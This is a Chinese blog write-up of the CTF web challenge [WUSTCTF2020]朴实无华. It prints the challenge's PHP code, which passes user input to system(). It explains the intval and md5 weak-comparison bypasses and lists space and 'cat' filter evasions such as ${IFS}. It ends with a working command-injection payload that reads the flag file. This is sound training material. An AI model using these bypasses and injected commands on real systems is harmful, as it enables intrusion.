[WUSTCTF2020]朴实无华

已于 2022-04-18 23:17:23 修改
阅读量344 收藏
点赞数 1
分类专栏: buuctf 文章标签: web安全 php 安全
于 2022-04-18 23:16:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/124260560
版权
本文详细分析了一次CTF挑战的解决过程,包括对header错误的理解、robots.txt的利用、以及通过科学计数法和弱类型比较进行level1和level2的绕过。最后,通过特殊字符和字符串替换规避过滤获取flag。涉及知识点包括PHP安全和HTTP头信息处理。
摘要由CSDN通过智能技术生成

web第46题
[WUSTCTF2020]朴实无华
打开靶场:
在这里插入图片描述
其中有一个header的报错,搜了一下,一般来说在header函数前不能输出html内容,如果在header()执行之前有echo等语句,当后面遇到header()时,就会报出 “Warning: Cannot modify header information - headers already sent by …”错误。就是说在这些函数的前面不能有任何文字、空行、回车等,而且最好在header()函数后加上exit()函数

除了这个就没什么发现,直接目录扫描一下看有没有发现
在这里插入图片描述
发现有robots.txt文件,访问一下:
在这里插入图片描述
发现提示了一个文件,访问
在这里插入图片描述
发现不是flag
这里我又尝试抓了一下包
在这里插入图片描述
发现有提示,访问
在这里插入图片描述
源码:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

1.level1的绕过
if(intval($num) < 2020 && intval($num + 1) > 2021)在这里插入图片描述
intval(‘1e10’),当参数为科学计数法的字符串的时候,会保留e前面的数字作为转换结果,测试一下:
在这里插入图片描述
尝试:?num='2e4',发现不成功,猜测可能后台会自动将传入的值转换为字符串
尝试:?num=2e4,成功绕过第一个if判断

2.level2的绕过
$ md5=$ _GET[‘md5’];
if ($ md5==md5($md5))
这里考虑php的 ==弱比较,如果本身的值以0e开头并且md5加密后的值也以0e开头就可以绕过此比较
在这里插入图片描述
找到这样的字符串,构造:?md5=0e215962017
在这里插入图片描述
成功绕过

3.绕过get_flag判断
if(!strstr($get_flag," ")){
$get_flag = str_ireplace(“cat”, “wctf2020”, $get_flag);

首先get_flag变量中不能有空格,然后将get_flag变量中的cat字符替换为wctf2020
绕过空格过滤的方法:

${IFS} 但不能写作 $IFS
$IFS$9
%09
<>
<

绕过cat被过滤的方法:
1.加 \
2.使用tac

首先使用ls查看此目录下的文件:
在这里插入图片描述
显然是这个:
最终payload:

?num=2e4&md5=0e215962017&get_flag=c\at${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述

pakho_C
关注
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 681
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 537
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[WUSTCTF2020]朴实无华 1(代码审计intval、MD5、ca\t${IFS})
weixin_45577185的博客
09-08 240
刚打开时乱码: 解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码 发现有bot的字样,打开robots.txt 发现fAke_f1agggg.php,打开 啥都没有,抓一下当前网页的包 发现 /fl4g.php,打开,发现代码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //leve
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4651
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
[WUSTCTF 2020]朴实无华
最新发布
The_Epiphany的博客
03-07 1417
在本题中PHP版本为5.6.40,若传入value为“1e4”第一次会被识别为字符串,返回值为1,后+1时会被识别为数字,返回1e4+1。如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);如果字符串以 "0b" (或 "0B") 开头,使用 2 进制 (binary);如果字符串以 "0" 开始,使用 8 进制(octal);很综合的一道题,虽然比较简单,但是可以用来进行知识巩固,不多逼逼直接开始。弱相等,原理是比较时截断,前保留后丢弃。反斜线:即转义字符;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值